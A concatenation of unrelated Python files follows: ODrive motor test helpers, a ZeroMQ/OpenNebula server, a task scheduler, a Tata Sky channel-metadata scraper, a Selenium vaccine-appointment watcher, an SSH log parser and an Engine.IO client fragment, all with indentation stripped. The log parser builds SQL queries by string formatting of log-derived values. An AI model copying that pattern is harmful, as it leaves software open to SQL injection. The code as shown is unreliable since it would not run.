data = get_var_callback()
except Exception as ex:
print(str(ex))
print("Waiting 1 second before next data point")
time.sleep(1)
continue
relative_time = time.monotonic() - start_time
vals.append([relative_time] + data)
time.sleep(period - (relative_time % period)) # this ensures consistently timed samples
self.data = np.array(vals) # A lock is not really necessary due to the event
print("Capture complete")
achieved_data_rate = len(self.data) / self.data[-1, 0]
if achieved_data_rate < (data_rate * 0.9):
print("Achieved average data rate: {}Hz".format(achieved_data_rate))
print("If this rate is significantly lower than what you specified, consider lowering it below the achieved value for more consistent sampling.")
self.event.set() # tell the main thread that the bulk capture is complete
Thread(target=loop, daemon=True).start()
def plot(self):
import matplotlib.pyplot as plt
import inspect
from textwrap import wrap
plt.plot(self.data[:,0], self.data[:,1:])
plt.xlabel("Time (seconds)")
title = (str(inspect.getsource(self.get_var_callback))
.strip("['\\n']")
.split(" = ")[1])
plt.title("\n".join(wrap(title, 60)))
plt.legend(range(self.data.shape[1]-1))
plt.show()
def step_and_plot( axis,
step_size=100.0,
settle_time=0.5,
data_rate=500.0,
ctrl_mode=CONTROL_MODE_POSITION_CONTROL):
if ctrl_mode is CONTROL_MODE_POSITION_CONTROL:
get_var_callback = lambda :[axis.encoder.pos_estimate, axis.controller.pos_setpoint]
initial_setpoint = axis.encoder.pos_estimate
def set_setpoint(setpoint):
axis.controller.pos_setpoint = setpoint
elif ctrl_mode is CONTROL_MODE_VELOCITY_CONTROL:
get_var_callback = lambda :[axis.encoder.vel_estimate, axis.controller.vel_setpoint]
initial_setpoint = 0
def set_setpoint(setpoint):
axis.controller.vel_setpoint = setpoint
else:
print("Invalid control mode")
return
initial_settle_time = 0.5
initial_control_mode = axis.controller.config.control_mode # Set it back afterwards
print(initial_control_mode)
axis.controller.config.control_mode = ctrl_mode
axis.requested_state = AXIS_STATE_CLOSED_LOOP_CONTROL
capture = BulkCapture(get_var_callback,
data_rate=data_rate,
duration=initial_settle_time + settle_time)
set_setpoint(initial_setpoint)
time.sleep(initial_settle_time)
set_setpoint(initial_setpoint + step_size) # relative/incremental movement
capture.event.wait() # wait for Bulk Capture to be complete
axis.requested_state = AXIS_STATE_IDLE
axis.controller.config.control_mode = initial_control_mode
capture.plot()
#ERG
def run_motor_characterize_input(odrv, axs, dir):
"""
Runs configured test input for motor characterization; records time, voltage command, position, and velocity to a *.CSV in the provided directory.
Note: must be set to gimbal motor mode and current control. Make sure current_limit is set appropriately,
and be aware that this 'current limit' actually signifies the voltage limit when in gimbal motor mode.
"""
from odrive.enums import AXIS_STATE_MOTOR_CHARACTERIZE_INPUT
from datetime import datetime
start_time = datetime.now()
time_string = start_time.strftime("%m%d%Y_%H%M%S")
file_name = dir + '\\motorData' + time_string + '.csv'
if not os.path.isdir(dir):
print("Error: invalid directory")
return
timeout = 30 # [s]
buffer_size = odrv.get_motor_characterize_data_size()
vals = []
with open(file_name, "a+") as file:
file.write('%Motor characterization data\n')
file.write("%Each row's values were recorded on the same timestep\n")
file.write("%Timestep increments at 8kHz\n\n")
file.write('%Operator:\n')
file.write('%Motor:\n')
file.write('%ODrive axis: axis' + str(axs) + '\n')
file.write('%Date:,' + start_time.strftime("%d/%m/%Y") + '\n')
file.write('%Start time:,' + start_time.strftime("%H:%M:%S") + '\n\n')
file.write('%timestep (8Hz),voltage,position,velocity\n')
file.write('%[#],[V],[turns],[turns/s]\n')
file.flush()
print("Input starting...")
if axs == 0 and odrv.axis0.motor.is_calibrated:
odrv.axis0.requested_state = AXIS_STATE_MOTOR_CHARACTERIZE_INPUT
elif axs == 1 and odrv.axis1.motor.is_calibrated:
odrv.axis1.requested_state = AXIS_STATE_MOTOR_CHARACTERIZE_INPUT
else:
print("Error: invalid axis. Please choose either 0 or 1, and make sure motor is calibrated.")
return
finished = False
finish_counter = 0
while not finished:
try:
idx = odrv.get_motor_characterize_data_idx()
#ERG TODO - figure out why fetching data with idx==0 shifts all the data over a column, remove idx>0 condition
#If desired, reducing data collected (e.g. to only timestep and velocity) could get lower latency
if idx < buffer_size and idx > 0:
data = [odrv.get_motor_characterize_data_timestep(idx),
odrv.get_motor_characterize_data_voltage(idx),
odrv.get_motor_characterize_data_position(idx),
odrv.get_motor_characterize_data_velocity(idx)]
else:
data = [float("NaN"), float("NaN"), float("NaN"), float("NaN")]
finish_counter += 1
except Exception as ex:
print(str(ex))
time.sleep(1)
continue
#Record latest data (do not write yet, to optimize for speed)
vals.append(data)
#Check for end conditions (either time recorded is zero, or timeout)
if data[0] < 1:
finish_counter += 1
else:
finish_counter = 0
if finish_counter > 10:
finished = True
elapsed = (datetime.now() - start_time).seconds
if elapsed >= timeout:
print("Timeout: took more than " + str(timeout) + " seconds")
finished = True
#When finished, write all recorded data
if finished:
print("Input finished. Recording data...")
for line in vals:
str_data = map(str,line)
file.write(",".join(str_data) + ';\n')
file.flush()
print("Data saved at: " + file_name)
return
def print_drv_regs(name, motor):
"""
Dumps the current gate driver regisers for the specified motor
"""
fault = motor.gate_driver.drv_fault
status_reg_1 = motor.gate_driver.status_reg_1
status_reg_2 = motor.gate_driver.status_reg_2
ctrl_reg_1 = motor.gate_driver.ctrl_reg_1
ctrl_reg_2 = motor.gate_driver.ctrl_reg_2
print(name + ": " + str(fault))
print("DRV Fault Code: " + str(fault))
print("Status Reg 1: " + str(status_reg_1) + " (" + format(status_reg_1, '#010b') + ")")
print("Status Reg 2: " + str(status_reg_2) + " (" + format(status_reg_2, '#010b') + ")")
print("Control Reg 1: " + str(ctrl_reg_1) + " (" + format(ctrl_reg_1, '#013b') + ")")
print("Control Reg 2: " + str(ctrl_reg_2) + " (" + format(ctrl_reg_2, '#09b') + ")")
def show_oscilloscope(odrv):
size = 18000
values = []
for i in range(size):
values.append(odrv.get_oscilloscope_val(i))
import matplotlib.pyplot as plt
plt.plot(values)
plt.show()
def rate_test(device):
"""
Tests how many integers per second can be transmitted
"""
# import matplotlib.pyplot as plt
# plt.ion()
print("reading 10000 values...")
numFrames = 10000
vals = []
for _ in range(numFrames):
vals.append(device.axis0.loop_counter)
loopsPerFrame = (vals[-1] - vals[0])/numFrames
loopsPerSec = (168000000/(6*3500))
FramePerSec = loopsPerSec/loopsPerFrame
print("Frames per second: " + str(FramePerSec))
# plt.plot(vals)
# plt.show(block=True)
def usb_burn_in_test(get_var_callback, cancellation_token):
"""
Starts background threads that read a values form the USB device in a spin-loop
"""
def fetch_data():
global vals
i = 0
while not cancellation_token.is_set():
try:
get_var_callback()
i += 1
except Exception as ex:
print(str(ex))
time.sleep(1)
i = 0
continue
if i % 1000 == 0:
print("read {} values".format(i))
threading.Thread(target=fetch_data, daemon=True).start()
def yes_no_prompt(question, default=None):
if default is None:
question += " [y/n] "
elif default == True:
question += " [Y/n] "
elif default == False:
question += " [y/N] "
while True:
print(question, end='')
choice = input().lower()
if choice in {'yes', 'y'}:
return True
elif choice in {'no', 'n'}:
return False
elif choice == '' and default is not None:
return default
|
utils.py | import pathlib
import subprocess
import threading
import psutil
def git_version():
"""
Return current version of this github-repository
:return: str
"""
version_file = pathlib.Path(pathlib.Path(__file__).absolute().parent.parent, '.git', 'FETCH_HEAD')
if version_file.exists():
f = open(version_file, 'r')
version_line = f.readline().split()
version = version_line[0][:7] # Is much longer but only the first 7 letters are presented on Github
repo = version_line[-1]
return 'github version "{}" of repository {}'.format(version, repo)
else:
return ''
def metadata_string_to_dict(string):
key_value = [item.strip() for item in string.split('#')]
data = {}
for key_val in key_value:
key, value = [item.strip() for item in key_val.split(':')]
data[key] = value
return data
def metadata_dict_to_string(data):
string_list = []
for key, value in data.items():
string_list.append(f'{key}: {value}')
string = ' # '.join(string_list)
return string
def _get_running_programs():
program_list = []
for p in psutil.process_iter():
program_list.append(p.name())
return program_list
def _run_subprocess(line):
subprocess.run(line)
def run_program(program, line):
if program in _get_running_programs():
raise ChildProcessError(f'{program} is already running!')
t = threading.Thread(target=_run_subprocess(line))
t.daemon = True # close pipe if GUI process exits
t.start()
|
mtszmq.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2021 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import os
import threading
import zmq
import json
import logging
import pyone
import logging.config
import configparser
import argparse
import base64
import random
from security.aes_cbc import *
from commands.Dispatcher import CommandsDispatcher
def args_parse():
"""
Arguments parsing:
-c [/path/to/file]- configuration file path (default - current directory, file config.ini)
"""
parser = argparse.ArgumentParser()
parser.add_argument('-c', default='config.ini')
args = parser.parse_args()
return args
def config_parser(config_file):
"""
Configuration file parsing.
Returns dictionary with configuration parameters:
'one_auth_file' - Opennebula sessions credential file path,
'key_file' - AES key file path,
'workers_quantity' - ZMQ workers quantity,
'server_ip' - IP address for ZMQ routing server binding,
'server_port' - Port number for ZMQ routing server binding,
'pidfile' - PID file path,
'vm_user' - VM user name,
'password_size' - Size password for VM users,
'password_complexity' - Complexity password for VM users(bool),
'loggerconf_file' - Logger configuration file path.
"""
config = configparser.ConfigParser()
config.read(config_file)
cinfig_dict = {'one_auth_file': config.get('auth_file','one_auth_file'),
'key_file': config.get('auth_file','key_file'),
'workers_quantity': int(config.get('zmq_workers_quantity','workers_quantity')),
'server_ip': config.get('ip_address_port','server_ip'),
'server_port': config.get('ip_address_port','server_port'),
'pidfile': config.get('pid_file','pidfile'),
'vm_user': config.get('vm_user_name','vm_user'),
'password_size': int(config.get('password_vm_users','password_size')),
'password_complexity': config.getboolean('password_vm_users','password_complexity'),
'loggerconf_file': config.get('logger_config_file','loggerconf_file')
}
return cinfig_dict
def session_id_generator(size = 8):
"""
Generating session id
"""
s = "0123456789ABCDEF"
return "".join(random.sample(s,size ))
def worker_routine(url_worker, key, worker_number, config_params, context=None):
"""
Worker routine
"""
logger = logging.getLogger(__name__)
AESobj = AESCipher(key)
CDobj = CommandsDispatcher(config_params)
# Getting Opennebula sessions credential
one_auth_file = open(config_params['one_auth_file'],"r")
session = one_auth_file.read().replace('\n', '')
one_auth_file.close()
one = pyone.OneServer("http://localhost:2633/RPC2", session)
context = context or zmq.Context.instance()
# Socket to talk to dispatcher
socket = context.socket(zmq.REP)
socket.connect(url_worker)
logger.info(("Worker %s started") % worker_number)
while True:
json_receive = AESobj.decrypt(socket.recv())
session_id = session_id_generator()
if json_receive:
logger.info(("Worker %s received session ID: %s") % (worker_number, session_id))
json_reply = json.dumps(CDobj.command_switcher(json_receive, session_id, one, config_params))
socket.send(AESobj.encrypt(json_reply))
else:
logger.info(("Session ID: %s. Worker %s received a message with an unsupported encryption method. ") % (session_id, worker_number))
json_reply = json.dumps({"error": "unsupported encryption method"})
socket.send(json_reply)
#send reply back to client
#socket.send(json_reply)
#socket.send(AESobj.encrypt(json_reply))
def main(config_params):
"""
Routing server
"""
# Getting AES key
key_file = open(config_params['key_file'],"r")
key = base64.b64decode(key_file.read())
key_file.close()
# Configuration for logging
logging.config.fileConfig(fname=config_params['loggerconf_file'], disable_existing_loggers=False)
logger = logging.getLogger(__name__)
logger.info("Routing server started")
url_worker = "inproc://workers"
url_client = "tcp://" + config_params['server_ip'] + ":" + config_params['server_port']
# Prepare our context and sockets
context = zmq.Context.instance()
# Socket to talk to clients
clients = context.socket(zmq.ROUTER)
clients.bind(url_client)
# Socket to talk to workers
workers = context.socket(zmq.DEALER)
workers.bind(url_worker)
# Launch pool of worker threads
for worker_number in range(config_params['workers_quantity']):
thread = threading.Thread(target=worker_routine, args=(url_worker, key, worker_number, config_params))
thread.start()
zmq.proxy(clients, workers)
# We never get here but clean up anyhow
clients.close()
workers.close()
context.term()
if __name__ == "__main__":
config_params = config_parser(args_parse().c)
pid = str(os.getpid())
file(config_params['pidfile'], 'w').write(pid)
main(config_params)
|
scheduler.py | import sys
import traceback
if sys.version_info[0] < 3:
import queue as queue
else:
import queue
import threading
from yaku.task_manager \
import \
run_task, order_tasks, TaskManager
from yaku.utils \
import \
get_exception
import yaku.errors
def run_tasks(ctx, tasks=None):
if tasks is None:
tasks = ctx.tasks
task_manager = TaskManager(tasks)
s = SerialRunner(ctx, task_manager)
s.start()
s.run()
def run_tasks_parallel(ctx, tasks=None, maxjobs=1):
if tasks is None:
tasks = ctx.tasks
task_manager = TaskManager(tasks)
r = ParallelRunner(ctx, task_manager, maxjobs)
r.start()
r.run()
class SerialRunner(object):
def __init__(self, ctx, task_manager):
self.ctx = ctx
self.task_manager = task_manager
def start(self):
# Dummy to give same interface as ParallelRunner
pass
def run(self):
grp = self.task_manager.next_set()
while grp:
for task in grp:
run_task(self.ctx, task)
grp = self.task_manager.next_set()
class ParallelRunner(object):
def __init__(self, ctx, task_manager, maxjobs=1):
self.njobs = maxjobs
self.task_manager = task_manager
self.ctx = ctx
self.worker_queue = queue.Queue()
self.error_out = queue.Queue()
self.failure_lock = threading.Lock()
self.stop = False
def start(self):
def _worker():
# XXX: this whole thing is an hack - find a better way to
# notify task execution failure to all worker threads
while not self.stop:
task = self.worker_queue.get()
try:
run_task(self.ctx, task)
except yaku.errors.TaskRunFailure:
e = get_exception()
self.failure_lock.acquire()
self.stop = True
self.failure_lock.release()
task.error_msg = e.explain
task.error_cmd = e.cmd
self.error_out.put(task)
except Exception:
e = get_exception()
exc_type, exc_value, tb = sys.exc_info()
lines = traceback.format_exception(exc_type, exc_value, tb)
self.failure_lock.acquire()
self.stop = True
self.failure_lock.release()
task.error_msg = "".join(lines)
task.error_cmd = []
self.error_out.put(task)
self.worker_queue.task_done()
for i in range(self.njobs):
t = threading.Thread(target=_worker)
t.setDaemon(True)
t.start()
def run(self):
grp = self.task_manager.next_set()
while grp:
for task in grp:
self.worker_queue.put(task)
# XXX: we only join once we detect the worker queue to be empty, to
# avoid blocking for a long time. This is naive, and will break if
# the worker_queue is filled after this point
while not self.stop:
if self.worker_queue.empty():
self.worker_queue.join()
break
if not self.error_out.empty():
task = self.error_out.get()
msg = task.error_msg
cmd = task.error_cmd
raise yaku.errors.TaskRunFailure(cmd, msg)
grp = self.task_manager.next_set()
|
allChannels.py | ### Script to get all channels from tata sky
import threading
API_BASE_URL = "https://kong-tatasky.videoready.tv/"
import requests
import json as json
channel_list = []
def getChannelInfo(channelId):
url = API_BASE_URL + "content-detail/pub/api/v1/channels/" + channelId
x = requests.get(url)
channel_meta = x.json()['data']['meta'][0]
channel_detail_dict = x.json()['data']['detail']
onechannl = {
"channel_id": str(channelId),
"channel_name": channel_meta['channelName'],
"channel_license_url": channel_detail_dict['dashWidewineLicenseUrl'],
"channel_url": channel_detail_dict['dashWidewinePlayUrl'],
"channel_entitlements": channel_detail_dict['entitlements'],
"channel_logo": channel_meta['channelLogo'],
}
channel_list.append(onechannl)
def saveChannelsToFile():
print(len(channel_list))
with open("allchannels.json", "w") as channel_list_file:
json.dump(channel_list, channel_list_file)
def processChnuks(channel_lists):
for channel in channel_lists:
print("Getting channelId:" ,channel['id'])
channel_id = str(channel['id'])
getChannelInfo(channel_id)
def getAllChannels():
ts = []
url = API_BASE_URL + "content-detail/pub/api/v1/channels?limit=443"
x = requests.get(url)
channel_list = x.json()['data']['list']
print("Total Channels fetched:", len(channel_list))
print("Fetching channel info..........")
for i in range(0, len(channel_list), 5):
t = threading.Thread(target=processChnuks, args=([channel_list[i:i + 5]]))
ts.append(t)
t.start()
for t in ts:
t.join()
print("Saving all to a file.... " + str(len(channel_list)))
saveChannelsToFile()
if __name__ == '__main__':
getAllChannels()
|
watcher.py | import sys
import time
import json
import elemental
import threading
import requests
from seleniumwire import webdriver
from subprocess import check_output
from dataclasses import dataclass
from datetime import datetime
import argparse
import gc
from . import get_logger
logger = get_logger()
_watcher_lock = threading.Lock()
_watcher = None
def run_command(cmd):
out = check_output(cmd, shell=True)
if isinstance(out, bytes):
out = out.decode('utf8')
return out.strip()
def create_timestamp():
return datetime.now().strftime('%m-%d-%Y %H:%M:%S')
class Browser:
def __init__(self):
self.chrome_options = webdriver.ChromeOptions()
self.chrome_options.add_argument("--disable-gpu")
self.chrome_options.add_argument("--disable-software-rasterizer")
self.chrome_options.add_argument("--headless")
self.chrome_options.add_argument("--disable-dev-shm-usage")
self.chrome_options.add_argument("--window-size=1920x1080")
self.chrome_options.add_argument("--disable-setuid-sandbox")
self.chrome_options.add_argument("--no-sandbox")
self.selenium_wire_options = {
'exclude_hosts': ['google-analytics.com', 'facebook.com', 'youtube.com', 'adservice.google.com', 'insight.adsrvr.org']
}
self.exec_path = run_command('which chromedriver')
self._driver = None
self._browser = None
self._calls = 0
def should_reset(self):
if self._calls > 10:
self._reset()
self._calls = 0
self._calls += 1
def _reset(self):
self._create_driver()
self._create_browser()
def _create_driver(self):
if self._driver:
self.close()
self._driver = webdriver.Chrome(options=self.chrome_options, seleniumwire_options=self.selenium_wire_options, executable_path=self.exec_path)
def _create_browser(self):
if self._browser:
return
if not self._driver:
self._create_driver()
self._browser = elemental.Browser(self._driver)
@property
def driver(self):
if not self._driver:
self._create_driver()
return self._driver
@property
def browser(self):
if not self._browser:
self._create_browser()
return self._browser
def close(self):
self._driver.close()
self._driver.quit()
self._driver = None
self._browser = None
gc.collect()
@dataclass
class Config:
city: str = 'Houston'
state: str = 'Texas'
state_abbr: str = 'TX'
zipcode: str = '77056'
_wg_steps = [
'https://www.walgreens.com/',
'https://www.walgreens.com/findcare/vaccination/covid-19?ban=covid_scheduler_brandstory_main_March2021',
]
_avail_links = {
'cvs': 'https://www.cvs.com/immunizations/covid-19-vaccine?icid=cvs-home-hero1-link2-coronavirus-vaccine',
'wg': 'https://www.walgreens.com/findcare/vaccination/covid-19?ban=covid_scheduler_brandstory_main_March2021'
}
class VaccineWatcher:
def __init__(self, config, freq_secs=600, hook=None, check_walgreens=True, check_cvs=True, send_data=True, always_send=False, verbose=False):
self.config = Config(**config)
self.freq = freq_secs
self.send_data = send_data
self.always_send = always_send
self.hook = hook
self.verbose = verbose
self._last_status = {'walgreens': {'available': False, 'data': None, 'timestamp': None}, 'cvs': {'available': False, 'data': None, 'timestamp': None}}
self._check_wg = check_walgreens
self._check_cvs = check_cvs
self.api = Browser()
self.browser = self.api.browser
self.alive = True
self.dactive = False
logger.log(f'Initialized VaccineWatcher with {self.config}. Will Check every {self.freq} secs. Walgreens: {self._check_wg}. CVS: {self._check_cvs}\nCall .run() to start daemon')
def _wg_parser(self, resp):
data = json.loads(resp.body.decode('utf-8'))
self._last_status['walgreens']['data'] = data
if data.get('appointmentsAvailable') and data['appointmentsAvailable']:
msg = f'Walgreens has Available Appointments: {data["availabilityGroups"]} for Next {data["days"]} in {data["zipCode"]}, {data["stateCode"]} in {data["radius"]} mile radius'
msg += f'\nPlease Visit: {_avail_links["wg"]} to schedule.'
self._call_hook(msg)
logger.log(msg)
return True
if self.verbose:
msg = f'Result for Walgreens: {data}'
logger.log(msg)
return False
def check_wg(self):
self.browser.visit(_wg_steps[0])
time.sleep(5)
self.browser.visit(_wg_steps[1])
time.sleep(5)
self.browser.get_element(partial_link_text="Schedule new appointment").click()
time.sleep(3)
self.browser.get_input(id="inputLocation").fill(f'{self.config.city} {self.config.state} {self.config.zipcode}')
self.browser.get_button(text="Search").click()
time.sleep(1)
reqs = self.browser.selenium_webdriver.requests
for r in reqs:
if r.response:
if '/hcschedulersvc/svc/v1/immunizationLocations/availability' in r.url:
return self._wg_parser(r.response)
return None
def _cvs_parser(self, resp):
data = json.loads(resp.body.decode('utf-8'))['responsePayloadData']['data'][self.config.state_abbr]
for item in data:
if item['city'] == self.config.city.upper():
self._last_status['cvs']['data'] = item
if item['status'] == 'Available':
msg = f'CVS has Available Appointments in {item["city"]}, {item["state"]}'
msg += f'\nPlease Visit: {_avail_links["cvs"]} to schedule.'
self._call_hook(msg)
logger.log(msg)
return True
if self.verbose:
msg = f'Results for CVS: {item}'
logger.log(msg)
return False
def check_cvs(self):
self.browser.visit('https://www.cvs.com/')
time.sleep(1)
self.browser.get_element(partial_link_text="Check vaccine availability").click()
self.browser.get_element(partial_link_text=self.config.state).click()
reqs = self.browser.selenium_webdriver.requests
for r in reqs:
if r.response:
if 'https://www.cvs.com/immunizations/covid-19-vaccine.vaccine-status' in r.url:
return self._cvs_parser(r.response)
return None
def run(self):
if not self.dactive:
t = threading.Thread(target=self._daemon, daemon=True)
t.start()
def last_check(self):
return self._last_status
def _call_hook(self, msg=None):
if not self.hook:
return
if not msg and not self.send_data:
return
if msg and self.send_data:
self.hook(message=msg, data=self.last_check())
elif msg:
self.hook(message=msg)
elif always_send:
self.hook(message=None, data=self.last_check())
def _daemon(self):
self.dactive = True
print(f'Vaccine Watcher Active')
while self.alive:
if self._check_cvs:
self._last_status['cvs']['available'] = self.check_cvs()
self._last_status['cvs']['timestamp'] = create_timestamp()
if self._check_wg:
self._last_status['walgreens']['available'] = self.check_wg()
self._last_status['walgreens']['timestamp'] = create_timestamp()
self._call_hook()
self.api.should_reset()
time.sleep(self.freq)
def __call__(self, check_walgreens=True, check_cvs=True):
res = {}
if check_walgreens:
res['walgreens'] = self.check_wg()
if check_cvs:
res['cvs'] = self.check_cvs()
return res
def __enter__(self):
return self
def close(self):
self.alive = False
self.api.close
msg = 'Vaccine Watcher is exiting'
self._call_hook(msg)
logger.log(msg)
def __exit__(self, *_):
self.close()
def configure_watcher(**config):
global _watcher
with _watcher_lock:
if _watcher:
return
_watcher = VaccineWatcher(**config)
def get_vaccine_watcher(**config):
configure_watcher(**config)
return _watcher
class ZapierWebhook:
def __init__(self, url):
self.url = url
self.s = requests.Session()
logger.log(f'Initialized Zapier Webhook at {self.url}')
def __call__(self, message=None, data=None):
if not message or data:
return
params = {}
if message:
params['message'] = message
if data:
params.update(data)
params['timestamp'] = create_timestamp()
r = self.s.post(self.url, json=params)
if r.status_code == 200:
logger.log(f'Successfully sent to Zapier Webhook: {params}')
else:
logger.log(f'Potential Error sending to Zapier Webhook')
def cli():
parser = argparse.ArgumentParser(description='Vaccine Watcher CLI')
parser.add_argument('--city', dest='city', type=str, default="Houston", help='Full name of your City.')
parser.add_argument('--state', dest='state', type=str, default="Texas", help='Full name of your State.')
parser.add_argument('--abbr', dest='state_abbr', type=str, default="TX", help='State Abbreviation')
parser.add_argument('--zip', dest='zipcode', type=str, default="77056", help='Your nearest Zipcode')
parser.add_argument('--freq', dest='freq', type=int, default=600, help='Seconds between refreshes')
parser.add_argument('--zapier', dest='zapierhook', type=str, default=None, help='A Zapier Webhook URL to Send Messages/Notifications')
parser.add_argument('--no-cvs', dest='cvs', default=True, action='store_false', help='Disable CVS Search.')
parser.add_argument('--no-wg', dest='wg', default=True, action='store_false', help='Disable Walgreens Search.')
parser.add_argument('--verbose', dest='verbose', default=False, action='store_true', help='Enable verbosity. Will log results regardless of status')
args = parser.parse_args()
params = {'city': args.city.capitalize(), 'state': args.state.capitalize(), 'state_abbr': args.state_abbr.upper(), 'zipcode': args.zipcode}
hook = None
if args.zapierhook:
hook = ZapierWebhook(args.zapierhook)
watcher = get_vaccine_watcher(config=params, freq_secs=args.freq, hook=hook, check_walgreens=args.wg, check_cvs=args.cvs, verbose=args.verbose)
watcher.run()
while True:
try:
time.sleep(60)
except KeyboardInterrupt:
logger.info('Exiting due to Keyboard Interrupt')
watcher.close()
sys.exit()
except Exception as e:
watcher.close()
logger.info(f'Exiting Due to Error: {str(e)}')
sys.exit()
if __name__ == '__main__':
cli()
|
dataPre.py | import sqlite3
import os
import datetime
import threading, queue
import math
import time
class DataPre():
def __init__(self, filepath, setpath):
self.filepath = filepath
self.setpath = setpath
setName = os.path.basename(filepath)
self.setName = setName.split('.')[0]
self.tableName = 'DataPre'
self.connection = sqlite3.connect(\
os.path.join(self.setpath, self.setName+'.db'))
#self.connection = pymysql.connect("localhost", "root", "jeskkyf5", "test")
self.cursor = self.connection.cursor()
path = os.path.join(self.setpath, self.setName)
if not os.path.exists(path):
os.mkdir(path)
self.st_msg = (True, None)
self.lock = threading.Lock()
def add_msg(self, msg):
if self.st_msg[0]:
self.st_msg = (False, msg)
def execute_set(self, demand):
#connection = sqlite3.connect('%s/%s.db' % (self.setpath, self.setName))
#cursor = connection.cursor()
#cursor.execute(demand)
#connection.commit()
#connection.close()
#data = cursor.fetchall()
self.cursor.execute(demand)
self.connection.commit()
data = self.cursor.fetchall()
return data
def create_table(self):
dm = '''CREATE TABLE %s
(
id integer NOT NULL PRIMARY KEY AUTOINCREMENT,
Dates date NULL ,
Timing time NULL ,
user varchar(50) NULL ,
IP varchar(20) NULL ,
state varchar(10) NULL
);''' % self.tableName
try:
self.execute_set(dm)
except Exception as e:
self.add_msg(str(e))
def insert_table(self, Dates, Timing, user, IP, state):
dm = '''INSERT INTO %s(Dates, Timing, user, IP, state)
VALUES('%s', '%s', '%s', '%s', '%s');''' \
% (self.tableName, Dates, Timing, user, IP, state)
try:
self.execute_set(dm)
except Exception as e:
self.add_msg(str(e))
def insert_table_all(self, tups):
for tup in tups:
dm = '''INSERT INTO %s(Dates, Timing, user, IP, state)
VALUES('%s', '%s', '%s', '%s', '%s');''' \
% (self.tableName, tup[0], tup[1], tup[2], tup[3], tup[4])
try:
self.cursor.execute(dm)
except Exception as e:
self.add_msg(str(e))
try:
self.connection.commit()
except Exception as e:
self.add_msg(str(e))
def insert_table_queue(self, tup_queue):
while True:
tup = tup_queue.get()
dm = '''INSERT INTO %s(Dates, Timing, user, IP, state)
VALUES('%s', '%s', '%s', '%s', '%s');''' \
% (self.tableName, tup[0], tup[1], tup[2], tup[3], tup[4])
self.cursor.execute(dm)
tup_queue.task_done()
def insert_lines(self, lines):
for line in lines:
tup = self.check_line(line)
if tup is None:
continue
self.insert_table(*tup)
def estab_table2(self):
print(time.ctime())
line_queue = queue.Queue()
tups = []
i = 0
for n in range(10):
check_thread = threading.Thread(target=self.check_line_queue, args=(line_queue, tups,))
check_thread.setDaemon(True)
check_thread.start()
with open(self.filepath, 'rt') as f:
for line in f:
line_queue.put(line)
#tup = self.check_line(line)
#if tup is None:
# continue
#else:
# tups.append(tup)
line_queue.join()
print(time.ctime())
self.insert_table_all(tups)
#self.connection.commit()
print(time.ctime())
def estab_table(self):
self.create_table()
tups = []
with open(self.filepath, 'rt') as f:
i = 0
for line in f:
tup = self.check_line(line)
if tup is None:
continue
else:
tups.append(tup)
self.insert_table_all(tups)
def get_time(self, ls):
time = [str(datetime.datetime.now().year)]
time.extend(ls)
time = ' '.join(time)
time = datetime.datetime.strptime(time,'%Y %b %d %H:%M:%S')
time = datetime.datetime.strftime(time,'%Y-%m-%d %H:%M:%S')
return time.split(' ')
def get_checks(self, line):
checks = line.split(' ')
if '' in checks:
checks.remove('')
Dates, Timing = self.get_time(checks[0:3])
i = checks.index('from')
IP = checks[i+1]
user = checks[i-1]
while '"' in user or "'" in user or '[' in user or ']' in user:
user = 'BAD NAME'
return Dates, Timing, IP, user
def check_line(self, line):
if 'Accepted password' in line:
state = 'Success'
Dates, Timing, IP, user = self.get_checks(line)
return Dates, Timing, user, IP, state
elif 'Failed password' in line:
state = 'Failure'
Dates, Timing, IP, user = self.get_checks(line)
return Dates, Timing, user, IP, state
else:
return None
def check_line_queue(self, line_queue, tups):
while True:
line = line_queue.get()
tup = self.check_line(line)
if tup is not None:
self.lock.acquire()
tups.append(tup)
self.lock.release()
line_queue.task_done()
def show(self):
#dm = "PRAGMA table_info(%s)" % (self.tableName)
dm = "SELECT * FROM %s WHERE id = 10" % (self.tableName)
#dm = "SELECT DISTINCT(Dates) FROM %s" % self.tableName
#dm = "SELECT Timing, user, IP, state FROM %s WHERE Dates = '%s'" % (self.tableName, '2018-09-29')
#dm = "SELECT DISTINCT(user) FROM %s" % self.tableName
#dm = "SELECT * FROM %s WHERE Timing between datetime('2018-09-29', 'start of day', '1 second') and datetime('2018-09-29', 'start of day', '1 day', '-1 second') AND state='Failure'" % (self.tableName)
data = self.execute_set(dm)
for i in data:
print(i)
|
client.py | from base64 import b64encode
from json import JSONDecodeError
import logging
try:
import queue
except ImportError: # pragma: no cover
import Queue as queue
import signal
import ssl
import threading
import time
import six
from six.moves import urllib
try:
import requests
except ImportError: # pragma: no cover
requests = None
try:
import websocket
except ImportError: # pragma: no cover
websocket = None
from . import exceptions
from . import packet
from . import payload
default_logger = logging.getLogger('engineio.client')
connected_clients = []
if six.PY2: # pragma: no cover
ConnectionError = OSError
def signal_handler(sig, frame):
"""SIGINT handler.
Disconnect all active clients and then invoke the original signal handler.
"""
for client in connected_clients[:]:
if not client.is_asyncio_based():
client.disconnect()
if callable(original_signal_handler):
return original_signal_handler(sig, frame)
else: # pragma: no cover
# Handle case where no original SIGINT handler was present.
return signal.default_int_handler(sig, frame)
original_signal_handler = None
class Client(object):
"""An Engine.IO client.
This class implements a fully compliant Engine.IO web client with support
for websocket and long-polling transports.
:param logger: To enable logging set to ``True`` or pass a logger object to
use. To disable logging set to ``False``. The default is
``False``. Note that fatal errors are logged even when
``logger`` is ``False``.
:param json: An alternative json module to use for encoding and decoding
packets. Custom json modules must have ``dumps`` and ``loads``
functions that are compatible with the standard library
versions.
:param request_timeout: A timeout in seconds for requests. The default is
5 seconds.
:param http_session: an initialized ``requests.Session`` object to be used
when sending requests to the server. Use it if you
need to add special client options such as proxy
servers, SSL certificates, etc.
:param ssl_verify: ``True`` to verify SSL certificates, or ``False`` to
skip SSL certificate verification, allowing
connections to servers with self signed certificates.
The default is ``True``.
"""
event_names = ['connect', 'disconnect', 'message']
def __init__(self,
logger=False,
json=None,
request_timeout=5,
http_session=None,
ssl_verify=True):
global original_signal_handler
if original_signal_handler is None and \
